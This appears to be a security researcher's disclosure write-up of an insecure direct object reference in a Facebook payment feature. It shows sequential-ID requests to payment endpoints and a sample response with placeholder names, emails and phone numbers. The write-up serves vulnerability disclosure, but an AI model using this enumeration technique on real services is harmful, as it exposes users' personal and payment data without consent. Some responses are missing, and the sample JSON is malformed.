Disclose Emails, phone numbers, other information For Facebook users who tried to add funds to…

4 years ago 167


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while I was testing on Facebook I found option to send invoice to email

this option is used in many palaces on Facebook ,ADS account ,business account , Instagram..

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viewing the request of that options found out that using incrementing id

POST /fb-payment/7777777/send-email

in this request I could send any invoice to my email by changing the id

continue test found easier way to get invoices

POST /fb-payment/7777777/execute

the response for it was


continue search reading some documentation and some fuzzing found that I could use the “order_id” and “payment_method_id” to retrieve a payments information

which I can get this variables for all the users who tried that option from the previous request which is using incrementing id not random at all

Retrieve payments information


the response of this request was

{"id":7777777,"state":"PENDING","amount":400,"currency":"EGP","country":"EG","redirect":"https://facebook.com","payment_method_code":"EX","name":"Mustafa Ahmed",user_id:100,"email":"example@example.com""phone":"01111111111",user_agent":{"ua":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36","browser":{"name":"Chrome","version":"85.0.4183.121","major":"85"},"engine":{"name":"Blink"},"os":{"name":"Windows","version":"10"},"device":{},"cpu":{"architecture":"amd64"}}}

by that I was able to disclose this information for all Facebook users who tried to add funds to their Facebook by this option like

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